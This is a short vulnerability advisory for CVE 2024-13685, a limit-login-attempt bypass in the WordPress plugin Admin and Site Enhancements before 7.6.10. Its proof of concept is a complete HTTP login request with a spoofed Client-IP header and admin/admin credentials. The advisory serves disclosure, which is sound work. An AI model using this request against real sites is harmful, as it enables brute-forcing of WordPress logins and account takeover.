Admin and Site Enhancements (ASE) < 7.6.10 – Limit Login Attempt Bypass via IP Spoofing | CVE 2024-13685

Description

The plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate their value to bypass the login limit feature in the plugin.

Proof of Concept

Replace `Client-IP` with different values to bypass the limit login feature.

```
POST /wordpress/wp-login.php HTTP/1.1
Host: example.com
Client-IP: 1.1.1.17
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://example.com/wordpress/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: http://example.com
DNT: 1
Sec-GPC: 1
Connection: close
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1
Priority: u=0, i

log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fexample.com%2Fwordpress%2Fwp-admin%2F&testcookie=1

```